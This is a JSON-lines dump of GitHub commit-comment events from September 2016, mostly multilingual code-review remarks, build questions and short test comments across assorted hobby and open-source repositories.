{"id":"4537604897","type":"CommitCommentEvent","actor":{"login":"dtlares"},"repo":{"name":"matias09/tetris"},"payload":{"comment":{"id":18956195,"position":4,"line":4,"path":"Tetris/InputHandlerFactory.cpp","commit_id":"fe0b49a11a9347278709dc77154a4f6759e01fcb","created_at":"2016-09-09T01:19:45Z","updated_at":"2016-09-09T01:19:45Z","body":"Acá el parámetro input handler podría ser del tipo enum que definis en el .h. Hacelo público."}},"created_at":"2016-09-09T01:19:45Z"}
{"id":"4537605099","type":"CommitCommentEvent","actor":{"login":"ninaholic"},"repo":{"name":"puppylinux-woof-CE/woof-CE"},"payload":{"comment":{"id":18956197,"position":null,"line":null,"path":null,"commit_id":"113c206fa5f5f7352a404feb7d151bbbeef0abe9","created_at":"2016-09-09T01:19:50Z","updated_at":"2016-09-09T01:19:50Z","body":"Hi @01micko - Just curious, is the move from util-linux 2.27 ( https://github.com/puppylinux-woof-CE/woof-CE/commit/671db05f89d599095f8845c771d4139f95bd6f91 ) back to 2.21 intentional?"}},"created_at":"2016-09-09T01:19:50Z"}
{"id":"4537605391","type":"CommitCommentEvent","actor":{"login":"Mr-Cotton"},"repo":{"name":"Mr-Cotton/calculator-rspec"},"payload":{"comment":{"id":18956199,"position":null,"line":null,"path":null,"commit_id":"757d7d3479ab0e54c87034795a999b58ecdb3a63","created_at":"2016-09-09T01:19:57Z","updated_at":"2016-09-09T01:19:57Z","body":"\r\n+puts \"Coltons Calculator\"\r\n +print \">> \"\r\n +input = gets.chomp.split(\" \")\r\n +num1 = input[0].include?(\".\") ? input[0].to_f : input[0].to_i \r\n +num2 = input[2].include?(\".\") ? input[2].to_f : input[2].to_i\r\n +operator = input[1].to_sym\r\n +\r\n +result = case operator\r\n +when :+ then num1 + num2\r\n +when :- then num1 - num2\r\n +when :* then num1 * num2\r\n +when :/ \r\n +  if\r\n +     num2 == 0\r\n +\tthen puts \"The calculator explodes.\"\r\n +\telse num1 / num2\r\n +\tend\r\n +when :% then num1 % num2\r\n +else nil\r\n +end\r\n +puts \">> #{result}\" "}},"created_at":"2016-09-09T01:19:57Z"}
{"id":"4537605628","type":"CommitCommentEvent","actor":{"login":"dtlares"},"repo":{"name":"matias09/tetris"},"payload":{"comment":{"id":18956201,"position":11,"line":11,"path":"Tetris/InputHandlerFactory.cpp","commit_id":"fe0b49a11a9347278709dc77154a4f6759e01fcb","created_at":"2016-09-09T01:20:02Z","updated_at":"2016-09-09T01:20:02Z","body":"Me intriga saber quién va liberar ese puntero?"}},"created_at":"2016-09-09T01:20:02Z"}
{"id":"4537608179","type":"CommitCommentEvent","actor":{"login":"briankung"},"repo":{"name":"briankung/projectcredo"},"payload":{"comment":{"id":18956209,"position":4,"line":13,"path":"app/views/lists/show.html.erb","commit_id":"e5240cef8e29cf5c4de4f689dc3026f25a5f6af5","created_at":"2016-09-09T01:20:58Z","updated_at":"2016-09-09T01:20:58Z","body":"Another good reason to remove this is because `page` looks like a keyword. I didn't even realize you had put this here. It sounds like something that comes with Rails or refers to the DOM or something like that."}},"created_at":"2016-09-09T01:20:58Z"}
{"id":"4537609978","type":"CommitCommentEvent","actor":{"login":"dtlares"},"repo":{"name":"matias09/tetris"},"payload":{"comment":{"id":18956212,"position":9,"line":9,"path":"Tetris/InputHandlerFactory.h","commit_id":"fe0b49a11a9347278709dc77154a4f6759e01fcb","created_at":"2016-09-09T01:21:39Z","updated_at":"2016-09-09T01:21:39Z","body":"Esta función podría ser tranquilamente estática. O global. Ahí estaríamos mezclando paradigmas, pero a veces por simplicidad es válido. Fijate de hacerla estática."}},"created_at":"2016-09-09T01:21:39Z"}
{"id":"4537610474","type":"CommitCommentEvent","actor":{"login":"techlover1"},"repo":{"name":"techlover1/PugBot-for-Discord"},"payload":{"comment":{"id":18956214,"position":null,"line":null,"path":null,"commit_id":"ca7a7b2c1b51f85fb378376bb1a0b83f90f7919b","created_at":"2016-09-09T01:21:50Z","updated_at":"2016-09-09T01:21:50Z","body":"Auto pep8 cramped my style as well :|"}},"created_at":"2016-09-09T01:21:50Z"}
{"id":"4537613340","type":"CommitCommentEvent","actor":{"login":"Mafii"},"repo":{"name":"IDPA-2016-NEAT-CNN/NEAT_Visualizer"},"payload":{"comment":{"id":18956219,"position":null,"line":null,"path":null,"commit_id":"f2f01d258af60b97271adb7742d7ac0593aa1122","created_at":"2016-09-09T01:22:57Z","updated_at":"2016-09-09T01:22:57Z","body":"> Also broke the build on the branch FodyIntegration (likely, not 100% sure)\r\n\r\nit didn't break it. It was something else. :smile: "}},"created_at":"2016-09-09T01:22:57Z"}
{"id":"4537613644","type":"CommitCommentEvent","actor":{"login":"dtlares"},"repo":{"name":"matias09/tetris"},"payload":{"comment":{"id":18956220,"position":10,"line":10,"path":"Tetris/InputSdlImp.h","commit_id":"fe0b49a11a9347278709dc77154a4f6759e01fcb","created_at":"2016-09-09T01:23:06Z","updated_at":"2016-09-09T01:23:06Z","body":"destructor vitual"}},"created_at":"2016-09-09T01:23:06Z"}
{"id":"4537613934","type":"CommitCommentEvent","actor":{"login":"luismanuel001"},"repo":{"name":"distributev/the-app"},"payload":{"comment":{"id":18956222,"position":null,"line":null,"path":null,"commit_id":"9683a587e28f96f470a304f3c8edc5a466422374","created_at":"2016-09-09T01:23:12Z","updated_at":"2016-09-09T01:23:12Z","body":"They also get updated the server variables are sent from the front end to the backend "}},"created_at":"2016-09-09T01:23:12Z"}
{"id":"4537615460","type":"CommitCommentEvent","actor":{"login":"dtlares"},"repo":{"name":"matias09/tetris"},"payload":{"comment":{"id":18956227,"position":null,"line":null,"path":null,"commit_id":"fe0b49a11a9347278709dc77154a4f6759e01fcb","created_at":"2016-09-09T01:23:44Z","updated_at":"2016-09-09T01:23:44Z","body":"Muy bien!!! Sigamos adelante!!! :+1: "}},"created_at":"2016-09-09T01:23:44Z"}
{"id":"4537615679","type":"CommitCommentEvent","actor":{"login":"tagomoris"},"repo":{"name":"fluent/serverengine"},"payload":{"comment":{"id":18956229,"position":5,"line":20,"path":"serverengine.gemspec","commit_id":"a5883f0756b124805609037e49eedea6d4a97ee4","created_at":"2016-09-09T01:23:49Z","updated_at":"2016-09-09T01:23:49Z","body":"The reason of the change is just the EOL of ruby versions.\r\nRuby 2.0 and ealier are not maintained by ruby core team now."}},"created_at":"2016-09-09T01:23:49Z"}
{"id":"4537617427","type":"CommitCommentEvent","actor":{"login":"tagomoris"},"repo":{"name":"fluent/serverengine"},"payload":{"comment":{"id":18956236,"position":5,"line":20,"path":"serverengine.gemspec","commit_id":"a5883f0756b124805609037e49eedea6d4a97ee4","created_at":"2016-09-09T01:24:26Z","updated_at":"2016-09-09T01:24:26Z","body":"As @repeatedly said, you can use older releases of Fluentd and ServerEngine by specifying these versions explicitly."}},"created_at":"2016-09-09T01:24:26Z"}
{"id":"4537621439","type":"CommitCommentEvent","actor":{"login":"josenerydev"},"repo":{"name":"josenerydev/SVAD"},"payload":{"comment":{"id":18956245,"position":4,"line":113,"path":"src/main/webapp/cadastro.html","commit_id":"58fb40514eab4cfc1691fa65cbea86bc666f4e46","created_at":"2016-09-09T01:25:57Z","updated_at":"2016-09-09T01:25:57Z","body":"Não é assim que fecha a tag br!!"}},"created_at":"2016-09-09T01:25:57Z"}
{"id":"4537626770","type":"CommitCommentEvent","actor":{"login":"AlexandreSNeto"},"repo":{"name":"AlexandreSNeto/parking-app"},"payload":{"comment":{"id":18956253,"position":null,"line":null,"path":null,"commit_id":"3303aaddcfe8d864107d7fafab7840767ba7b5c0","created_at":"2016-09-09T01:27:47Z","updated_at":"2016-09-09T01:27:47Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;unfXEclI&#x2F;33-alterar-dockerfile-para-criar-uma-imagem-propria-baseada-no-nginx\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Alterar Dockerfile para criar uma imagem própria baseada no nginx</a>"}},"created_at":"2016-09-09T01:27:47Z"}
{"id":"4537631255","type":"CommitCommentEvent","actor":{"login":"SamiBoy2001"},"repo":{"name":"SamiBoy2001/Caps"},"payload":{"comment":{"id":18956260,"position":null,"line":null,"path":null,"commit_id":"c8a57cf363e8b815af1521bd1daec3dbf3f2190a","created_at":"2016-09-09T01:29:27Z","updated_at":"2016-09-09T01:29:27Z","body":"uploading caps_3.html"}},"created_at":"2016-09-09T01:29:27Z"}
{"id":"4537634484","type":"CommitCommentEvent","actor":{"login":"bwangel23"},"repo":{"name":"bwangel23/canvas"},"payload":{"comment":{"id":18956262,"position":19,"line":19,"path":"show-music/public/stylesheets/index.css","commit_id":"3c8cce011b2e36ef11024865c35ea92bfcdd911a","created_at":"2016-09-09T01:30:37Z","updated_at":"2016-09-09T01:30:37Z","body":"这句使得.right部分的位置为绝对定义。"}},"created_at":"2016-09-09T01:30:37Z"}
{"id":"4537636923","type":"CommitCommentEvent","actor":{"login":"robertohuertasm"},"repo":{"name":"robertohuertasm/vscode-icons"},"payload":{"comment":{"id":18956266,"position":null,"line":null,"path":null,"commit_id":"d1fb3eb495750aac7f52c66125770b41c7887662","created_at":"2016-09-09T01:31:31Z","updated_at":"2016-09-09T01:31:31Z","body":"Hey Jens! You're right, I forgot to remove the part where it says that the icons are not supported anymore. I would not remove the disclaimer as we're keeping the current functionality and we're going to extend the extension in order to work with the official API too. So we won't be removing what we already have. We're adding new functionality for the moment, until the VSCode team provides a similar experience, the users decide that is enough, or the VSCode team disables code injection."}},"created_at":"2016-09-09T01:31:31Z"}
{"id":"4537637078","type":"CommitCommentEvent","actor":{"login":"Wan-YunPeng"},"repo":{"name":"shellphish/shellphish-qemu"},"payload":{"comment":{"id":18956267,"position":null,"line":null,"path":null,"commit_id":"43c0977a3a55dce44f0b635499ceba45cdf39dfa","created_at":"2016-09-09T01:31:34Z","updated_at":"2016-09-09T01:31:34Z","body":"When I use \"pip install -e .\", I get this error, could you please tell why and how to solve it. Thanks a lot.\r\nmake[1]: Entering directory '/vagrant/rex/shellphish-qemu/shellphish-qemu-cgc-base/i386-linux-user'\r\nmake[1]: *** No rule to make target 'clean'. stop.\r\nmake[1]: Leaving directory '/vagrant/rex/shellphish-qemu/shellphish-qemu-cgc-base/i386-linux-user'\r\nMakefile:292: recipe for target 'clean' failed\r\nmake: *** [clean] Error 1\r\nConfiguring CGC tracer qemu...\r\nerror: Unable to clean shellphish-qemu-cgc-tracer\r\nI try \"python setup.py build\", it also says : \r\nmake[1]: Entering directory '/vagrant/rex/shellphish-qemu/shellphish-qemu-cgc-base/i386-linux-user'\r\nmake[1]: *** No rule to make target 'clean'.  Stop.\r\nmake[1]: Leaving directory '/vagrant/rex/shellphish-qemu/shellphish-qemu-cgc-base/i386-linux-user'\r\nMakefile:292: recipe for target 'clean' failed\r\nmake: *** [clean] Error 1\r\nerror: Unable to clean shellphish-qemu-cgc-tracer\r\nI can't figure out how to solve it. Could you please tell me?"}},"created_at":"2016-09-09T01:31:34Z"}
{"id":"4537637213","type":"CommitCommentEvent","actor":{"login":"bwangel23"},"repo":{"name":"bwangel23/canvas"},"payload":{"comment":{"id":18956268,"position":55,"line":55,"path":"show-music/public/stylesheets/index.css","commit_id":"3c8cce011b2e36ef11024865c35ea92bfcdd911a","created_at":"2016-09-09T01:31:37Z","updated_at":"2016-09-09T01:31:37Z","body":"页面自动缩小或变大，使得.right部分也会缩小变大，但是和浏览器边框保持的距离不变。"}},"created_at":"2016-09-09T01:31:37Z"}
{"id":"4537641029","type":"CommitCommentEvent","actor":{"login":"samdmarshall"},"repo":{"name":"DanToml/ascii_plist"},"payload":{"comment":{"id":18956277,"position":null,"line":null,"path":null,"commit_id":"cd8da767b7cc30af813c6ffb1be90d68718e51e9","created_at":"2016-09-09T01:33:08Z","updated_at":"2016-09-09T01:33:08Z","body":"Oh, does ruby not have a switch-case construct either?"}},"created_at":"2016-09-09T01:33:08Z"}
{"id":"4537641482","type":"CommitCommentEvent","actor":{"login":"Cathyusyd"},"repo":{"name":"Cathyusyd/hello-world"},"payload":{"comment":{"id":18956279,"position":34,"line":34,"path":"JSp1_4.php","commit_id":"380e13362edc808a19e38a0e6b1b333c196c8fec","created_at":"2016-09-09T01:33:17Z","updated_at":"2016-09-09T01:33:17Z","body":"This is for starting browser and open the url."}},"created_at":"2016-09-09T01:33:17Z"}
{"id":"4537641998","type":"CommitCommentEvent","actor":{"login":"Cathyusyd"},"repo":{"name":"Cathyusyd/hello-world"},"payload":{"comment":{"id":18956281,"position":34,"line":34,"path":"JSp1_4.php","commit_id":"380e13362edc808a19e38a0e6b1b333c196c8fec","created_at":"2016-09-09T01:33:30Z","updated_at":"2016-09-09T01:33:30Z","body":"Note"}},"created_at":"2016-09-09T01:33:30Z"}
{"id":"4537646397","type":"CommitCommentEvent","actor":{"login":"Cathyusyd"},"repo":{"name":"Cathyusyd/hello-world"},"payload":{"comment":{"id":18956296,"position":12,"line":370,"path":"JSp1_3.php","commit_id":"6bc9c092c04d6dd6b587598553f124df46ce69e5","created_at":"2016-09-09T01:35:07Z","updated_at":"2016-09-09T01:35:07Z","body":"@web-flow "}},"created_at":"2016-09-09T01:35:07Z"}
{"id":"4537649632","type":"CommitCommentEvent","actor":{"login":"Cathyusyd"},"repo":{"name":"Cathyusyd/hello-world"},"payload":{"comment":{"id":18956301,"position":6,"line":6,"path":"JSp1_3.php","commit_id":"6bc9c092c04d6dd6b587598553f124df46ce69e5","created_at":"2016-09-09T01:36:16Z","updated_at":"2016-09-09T01:36:16Z","body":"This is a comment."}},"created_at":"2016-09-09T01:36:16Z"}
{"id":"4537656935","type":"CommitCommentEvent","actor":{"login":"hj08120"},"repo":{"name":"GeekInTheClass/SeoulTrip"},"payload":{"comment":{"id":18956311,"position":null,"line":null,"path":null,"commit_id":"629f1444439857165a0974aaa21a43291259f36c","created_at":"2016-09-09T01:38:59Z","updated_at":"2016-09-09T01:38:59Z","body":"ㄴㅇㄴㅇㅇㅇ"}},"created_at":"2016-09-09T01:38:59Z"}
{"id":"4537657075","type":"CommitCommentEvent","actor":{"login":"DanToml"},"repo":{"name":"DanToml/ascii_plist"},"payload":{"comment":{"id":18956312,"position":null,"line":null,"path":null,"commit_id":"cd8da767b7cc30af813c6ffb1be90d68718e51e9","created_at":"2016-09-09T01:39:01Z","updated_at":"2016-09-09T01:39:01Z","body":"It does. This is literally your code ran through a ruby linter (named segiddins). ¯\\_(ツ)_/¯ "}},"created_at":"2016-09-09T01:39:01Z"}
{"id":"4537659779","type":"CommitCommentEvent","actor":{"login":"zcg12120258"},"repo":{"name":"ChemcloudInc/HaoCaiEnglish"},"payload":{"comment":{"id":18956314,"position":null,"line":null,"path":null,"commit_id":"05af735f3b6de9b8a4a54aca95baa1ef48d94929","created_at":"2016-09-09T01:40:04Z","updated_at":"2016-09-09T01:40:04Z","body":"ddd"}},"created_at":"2016-09-09T01:40:04Z"}
{"id":"4537663195","type":"CommitCommentEvent","actor":{"login":"WooLimKim"},"repo":{"name":"GeekInTheClass/sugang_ku"},"payload":{"comment":{"id":18956319,"position":9,"line":9,"path":"교양/정보사회론.md","commit_id":"c6b6f70eaa43d1c349ad0034db65c42b449f66c1","created_at":"2016-09-09T01:41:18Z","updated_at":"2016-09-09T01:41:18Z","body":"eee"}},"created_at":"2016-09-09T01:41:18Z"}
{"id":"4537663357","type":"CommitCommentEvent","actor":{"login":"darkevilmac"},"repo":{"name":"FabricMC/pomf"},"payload":{"comment":{"id":18956320,"position":5,"line":52,"path":"mappings/net/minecraft/block/tile/impl/TileEntityBeacon.mapping","commit_id":"142673563603631d9775cbdafb01660c89afcf98","created_at":"2016-09-09T01:41:22Z","updated_at":"2016-09-09T01:41:22Z","body":"Personally I dislike this change, just based off of the naming of itemstack. When you add something to a stack the size of the stack gets bigger. That's pretty intuitive isn't it? \r\n\r\nI guess it comes down to preference but I really don't like this."}},"created_at":"2016-09-09T01:41:22Z"}
{"id":"4537663706","type":"CommitCommentEvent","actor":{"login":"konekoya"},"repo":{"name":"konekoya/devEnvironment"},"payload":{"comment":{"id":18956321,"position":null,"line":null,"path":null,"commit_id":"a30ec90a333283b98a294c79035357a3103592f1","created_at":"2016-09-09T01:41:29Z","updated_at":"2016-09-09T01:41:29Z","body":"Omitting node_modules and .git directories in SublimeText. These two folders are making search extremely slow.."}},"created_at":"2016-09-09T01:41:29Z"}
{"id":"4537669696","type":"CommitCommentEvent","actor":{"login":"WooLimKim"},"repo":{"name":"GeekInTheClass/sugang_ku"},"payload":{"comment":{"id":18956333,"position":9,"line":9,"path":"교양/정보사회론.md","commit_id":"c6b6f70eaa43d1c349ad0034db65c42b449f66c1","created_at":"2016-09-09T01:43:37Z","updated_at":"2016-09-09T01:43:37Z","body":"# ㄸㄷ"}},"created_at":"2016-09-09T01:43:37Z"}
{"id":"4537670161","type":"CommitCommentEvent","actor":{"login":"zardus"},"repo":{"name":"shellphish/shellphish-qemu"},"payload":{"comment":{"id":18956334,"position":null,"line":null,"path":null,"commit_id":"43c0977a3a55dce44f0b635499ceba45cdf39dfa","created_at":"2016-09-09T01:43:48Z","updated_at":"2016-09-09T01:43:48Z","body":"Hello,\r\n\r\nLeaving comments on random commits makes it really hard to track issues and almost guarantees that your question won't be answered. Please open an issue, unless it's a comment on the commit in question.\r\n\r\nRegarding your installation questions, I *highly* recommend using our docker container (angr/angr on the docker hub) as the starting point. It's very hard to figure out whats wrong, otherwise, as it's pretty heavily dependent on the environment."}},"created_at":"2016-09-09T01:43:48Z"}
{"id":"4537670348","type":"CommitCommentEvent","actor":{"login":"WooLimKim"},"repo":{"name":"GeekInTheClass/sugang_ku"},"payload":{"comment":{"id":18956335,"position":9,"line":9,"path":"교양/정보사회론.md","commit_id":"c6b6f70eaa43d1c349ad0034db65c42b449f66c1","created_at":"2016-09-09T01:43:52Z","updated_at":"2016-09-09T01:43:52Z","body":"#3 "}},"created_at":"2016-09-09T01:43:52Z"}
{"id":"4537672512","type":"CommitCommentEvent","actor":{"login":"WooLimKim"},"repo":{"name":"GeekInTheClass/sugang_ku"},"payload":{"comment":{"id":18956345,"position":9,"line":9,"path":"교양/정보사회론.md","commit_id":"c6b6f70eaa43d1c349ad0034db65c42b449f66c1","created_at":"2016-09-09T01:44:43Z","updated_at":"2016-09-09T01:44:43Z","body":"#9 과제량 : 3"}},"created_at":"2016-09-09T01:44:43Z"}
{"id":"4537673888","type":"CommitCommentEvent","actor":{"login":"CovertJaguar"},"repo":{"name":"CovertJaguar/Railcraft"},"payload":{"comment":{"id":18956347,"position":5,"line":44,"path":"README.md","commit_id":"8d1ecd7e44bda790c4b38b5a1002957f9c25472f","created_at":"2016-09-09T01:45:15Z","updated_at":"2016-09-09T01:45:15Z","body":"It actually doesn't say anything about tagging. ;)"}},"created_at":"2016-09-09T01:45:15Z"}
{"id":"4537674941","type":"CommitCommentEvent","actor":{"login":"hj08120"},"repo":{"name":"GeekInTheClass/SeoulTrip"},"payload":{"comment":{"id":18956350,"position":12,"line":74,"path":"ReadMe.md","commit_id":"629f1444439857165a0974aaa21a43291259f36c","created_at":"2016-09-09T01:45:39Z","updated_at":"2016-09-09T01:45:39Z","body":"+##12. 가로수길\r\n+\r\n+ 강남에서 핫플레이스로 자리잡은 가로수길! 쇼핑부터 맛집까지 볼거리가 많아요\r\n+교통 :  3호선 신사역 "}},"created_at":"2016-09-09T01:45:39Z"}
{"id":"4537675748","type":"CommitCommentEvent","actor":{"login":"WooLimKim"},"repo":{"name":"GeekInTheClass/WowLegion"},"payload":{"comment":{"id":18956351,"position":null,"line":null,"path":null,"commit_id":"96b1db34e83a6190d63011d0d06468f3db880af0","created_at":"2016-09-09T01:45:57Z","updated_at":"2016-09-09T01:45:57Z","body":"ㅍㄹ\r\n\r\n"}},"created_at":"2016-09-09T01:45:57Z"}
{"id":"4537676421","type":"CommitCommentEvent","actor":{"login":"WooLimKim"},"repo":{"name":"GeekInTheClass/WowLegion"},"payload":{"comment":{"id":18956353,"position":null,"line":null,"path":null,"commit_id":"96b1db34e83a6190d63011d0d06468f3db880af0","created_at":"2016-09-09T01:46:12Z","updated_at":"2016-09-09T01:46:12Z","body":" # ㅈㄷㄱ"}},"created_at":"2016-09-09T01:46:12Z"}
{"id":"4537679193","type":"CommitCommentEvent","actor":{"login":"liach"},"repo":{"name":"CovertJaguar/Railcraft"},"payload":{"comment":{"id":18956357,"position":5,"line":44,"path":"README.md","commit_id":"8d1ecd7e44bda790c4b38b5a1002957f9c25472f","created_at":"2016-09-09T01:47:14Z","updated_at":"2016-09-09T01:47:14Z","body":"Then what is merged into dev actually? Sending accepted prs to master branch?"}},"created_at":"2016-09-09T01:47:14Z"}
{"id":"4537686451","type":"CommitCommentEvent","actor":{"login":"ShidoEPVP"},"repo":{"name":"OpenNos/OpenNos"},"payload":{"comment":{"id":18956373,"position":null,"line":null,"path":null,"commit_id":"15c10b98fc8cc6db5b0ab92371be2fb4735a45b1","created_at":"2016-09-09T01:50:02Z","updated_at":"2016-09-09T01:50:02Z","body":"\r\nHe has not forgotten it . \r\n![screenshot_1](https://cloud.githubusercontent.com/assets/17687634/18372940/7710cc30-7640-11e6-82bf-e07d2969c208.png)\r\n"}},"created_at":"2016-09-09T01:50:02Z"}
{"id":"4537686815","type":"CommitCommentEvent","actor":{"login":"hisRoyalRudeness"},"repo":{"name":"elarnia/_basic"},"payload":{"comment":{"id":18956375,"position":null,"line":null,"path":null,"commit_id":"9f71b3db09c84d8d88950680aa4e2ac966f406dc","created_at":"2016-09-09T01:50:12Z","updated_at":"2016-09-09T01:50:12Z","body":"[rudeproj1.pdf](https://github.com/elarnia/_basic/files/463032/rudeproj1.pdf)\r\n"}},"created_at":"2016-09-09T01:50:12Z"}
{"id":"4537687344","type":"CommitCommentEvent","actor":{"login":"BiaRamalhoBR"},"repo":{"name":"BiaRamalhoBR/Teste3SIS"},"payload":{"comment":{"id":18956376,"position":null,"line":null,"path":null,"commit_id":"dcd3c865a4d2147641dec208dba7c8bb5d256dd6","created_at":"2016-09-09T01:50:23Z","updated_at":"2016-09-09T01:50:23Z","body":"Coment"}},"created_at":"2016-09-09T01:50:23Z"}
{"id":"4537690172","type":"CommitCommentEvent","actor":{"login":"Uppermost"},"repo":{"name":"OpenNos/OpenNos"},"payload":{"comment":{"id":18956379,"position":null,"line":null,"path":null,"commit_id":"15c10b98fc8cc6db5b0ab92371be2fb4735a45b1","created_at":"2016-09-09T01:51:25Z","updated_at":"2016-09-09T01:51:25Z","body":"Forget to remove it "}},"created_at":"2016-09-09T01:51:25Z"}
{"id":"4537695040","type":"CommitCommentEvent","actor":{"login":"Uppermost"},"repo":{"name":"OpenNos/OpenNos"},"payload":{"comment":{"id":18956384,"position":null,"line":null,"path":null,"commit_id":"15c10b98fc8cc6db5b0ab92371be2fb4735a45b1","created_at":"2016-09-09T01:53:16Z","updated_at":"2016-09-09T01:53:16Z","body":"Ah no, chuck just rename your scene file is better to skip scene !"}},"created_at":"2016-09-09T01:53:16Z"}
{"id":"4537695747","type":"CommitCommentEvent","actor":{"login":"xueliangsun"},"repo":{"name":"xueliangsun/PCQueueandSleepSort"},"payload":{"comment":{"id":18956385,"position":null,"line":null,"path":null,"commit_id":"7905439f52769e580bd99ba0e79dc36c0eca337e","created_at":"2016-09-09T01:53:33Z","updated_at":"2016-09-09T01:53:33Z","body":"Thread.Sleep issues with Window7\r\nThe 10 threads version in my laptop with win7 is not working properly. For example, I ask thread 1 to sleep for 1 sec, and thread 2 to sleep for 2 sec, but they will both sleep for almost 0.01 sec. This takes place multiple times with different presentations.\r\nHowever, when I test in linux, it works pretty well, which means that the sleep function in linux is supported properly."}},"created_at":"2016-09-09T01:53:33Z"}
{"id":"4537696076","type":"CommitCommentEvent","actor":{"login":"soniawu"},"repo":{"name":"soniawu/itmd-361-pp"},"payload":{"comment":{"id":18956387,"position":null,"line":null,"path":null,"commit_id":"c649c574bbd50b4a477db347b6d0c3b66c711a67","created_at":"2016-09-09T01:53:41Z","updated_at":"2016-09-09T01:53:41Z","body":"ignore this change. the file had been deleted and restarted"}},"created_at":"2016-09-09T01:53:41Z"}
{"id":"4537696110","type":"CommitCommentEvent","actor":{"login":"christian-marie"},"repo":{"name":"christian-marie/git-vogue"},"payload":{"comment":{"id":18956388,"position":54,"line":157,"path":"lib/Git/Vogue/PluginCommon.hs","commit_id":"f1b98653558415c14aa2df1b15f7b8ad45b04edb","created_at":"2016-09-09T01:53:42Z","updated_at":"2016-09-09T01:53:42Z","body":"Can't I talk to myself in peace?"}},"created_at":"2016-09-09T01:53:42Z"}
{"id":"4537701350","type":"CommitCommentEvent","actor":{"login":"soniawu"},"repo":{"name":"soniawu/itmd-361-pp"},"payload":{"comment":{"id":18956400,"position":null,"line":null,"path":null,"commit_id":"91c92ba1654ad7f16a15a42c6a155ba6f51410e7","created_at":"2016-09-09T01:55:41Z","updated_at":"2016-09-09T01:55:41Z","body":"ignore this commit. the file had been deleted and re-started."}},"created_at":"2016-09-09T01:55:41Z"}
{"id":"4537702405","type":"CommitCommentEvent","actor":{"login":"HarmJ0y"},"repo":{"name":"adaptivethreat/BloodHound"},"payload":{"comment":{"id":18956401,"position":null,"line":null,"path":null,"commit_id":"8c448a4aa6dfa819efbef1cbfc3b029ae68add5c","created_at":"2016-09-09T01:56:07Z","updated_at":"2016-09-09T01:56:07Z","body":"@Meatballs1 - this one should be even faster for group enumeration, hopefully"}},"created_at":"2016-09-09T01:56:07Z"}
{"id":"4537703476","type":"CommitCommentEvent","actor":{"login":"soniawu"},"repo":{"name":"soniawu/itmd-361-pp"},"payload":{"comment":{"id":18956402,"position":null,"line":null,"path":null,"commit_id":"3d6f2b138a9350fd265aec24a15a3d4fc2e283a0","created_at":"2016-09-09T01:56:26Z","updated_at":"2016-09-09T01:56:26Z","body":"ignore this commit. this file had been deleted and re-started"}},"created_at":"2016-09-09T01:56:26Z"}
{"id":"4537703610","type":"CommitCommentEvent","actor":{"login":"HarmJ0y"},"repo":{"name":"adaptivethreat/BloodHound"},"payload":{"comment":{"id":18956403,"position":null,"line":null,"path":null,"commit_id":"c6ad08a93880e44eba689ee6f286663532cfb354","created_at":"2016-09-09T01:56:30Z","updated_at":"2016-09-09T01:56:30Z","body":"@Meatballs1 and @nullprobe - this commit https://github.com/adaptivethreat/BloodHound/commit/8c448a4aa6dfa819efbef1cbfc3b029ae68add5c should be significantly better for group enumeration"}},"created_at":"2016-09-09T01:56:30Z"}
{"id":"4537704582","type":"CommitCommentEvent","actor":{"login":"LKay"},"repo":{"name":"gaearon/redux-devtools"},"payload":{"comment":{"id":18956412,"position":3,"line":2,"path":"examples/todomvc/.babelrc","commit_id":"64f58b7010a1b2a71ad16716eb37ac1031f93915","created_at":"2016-09-09T01:56:49Z","updated_at":"2016-09-09T01:56:49Z","body":"`es2015-loose` preset is now deprecated. You should use `es2015` preset as follow according to [this](https://github.com/bkonkle/babel-preset-es2015-loose#deprecation-warning):\r\n```\r\n{\r\n    \"presets\": [[\"es2015\", { \"loose\" : true }]]\r\n}\r\n```\r\n"}},"created_at":"2016-09-09T01:56:49Z"}
{"id":"4539201665","type":"CommitCommentEvent","actor":{"login":"COpenda"},"repo":{"name":"onaio/blog"},"payload":{"comment":{"id":18960280,"position":14,"line":23,"path":"_posts/2016-02-21-security-and-backups.md","commit_id":"c0e08062b34db445c6d345e1fc51f5e62e4e3913","created_at":"2016-09-09T10:00:46Z","updated_at":"2016-09-09T10:00:46Z","body":"could we perhaps add what it means to use https? not everyone is technical."}},"created_at":"2016-09-09T10:00:46Z"}
{"id":"4539202070","type":"CommitCommentEvent","actor":{"login":"Zarel"},"repo":{"name":"Zarel/Pokemon-Showdown"},"payload":{"comment":{"id":18960285,"position":null,"line":null,"path":null,"commit_id":"3f5b6ad44d8d8997525a3cb7383bd15ba3f1cb72","created_at":"2016-09-09T10:00:51Z","updated_at":"2016-09-09T10:00:51Z","body":"You missed one:\r\n\r\nhttps://github.com/Zarel/Pokemon-Showdown/commit/a8b7e7e38b76cbf6f994aa8f65ee148bc27da442"}},"created_at":"2016-09-09T10:00:51Z"}
{"id":"4539202568","type":"CommitCommentEvent","actor":{"login":"rimutaka"},"repo":{"name":"hubsy-io/timelapse"},"payload":{"comment":{"id":18960289,"position":14,"line":178,"path":"README.md","commit_id":"6cdabc48ff36826f18d5c106abeabedada461dc0","created_at":"2016-09-09T10:00:57Z","updated_at":"2016-09-09T10:00:57Z","body":"Ok, you win.\n\nOn 9 Sep 2016 7:47 p.m., \"Ehsan Afzali\" <notifications@github.com> wrote:\n\n> It's possible if we write our own wrapper around Swiper and then ask users\n> to include that. and we do all that stuff there. But I guess this approach\n> is much better and customizable for user. They'll catch the idea and can\n> use whichever library they want and also they can manage their dependencies\n> themselves.\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/hubsy-io/timelapse/commit/6cdabc48ff36826f18d5c106abeabedada461dc0#commitcomment-18958980>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AFpsjJlmH_tA1Gq2RbQ-PCFMWILZBSr_ks5qoQ8BgaJpZM4J3ZbV>\n> .\n>\n"}},"created_at":"2016-09-09T10:00:57Z"}
{"id":"4539210570","type":"CommitCommentEvent","actor":{"login":"COpenda"},"repo":{"name":"onaio/blog"},"payload":{"comment":{"id":18960307,"position":19,"line":19,"path":"_posts/2015-07-01-security-and-backups.md","commit_id":"d6e624bd170be91184935141d52c6326419ed943","created_at":"2016-09-09T10:02:42Z","updated_at":"2016-09-09T10:02:42Z","body":"perhaps add the translation for the non techies? like what it means to use https and encryption"}},"created_at":"2016-09-09T10:02:42Z"}
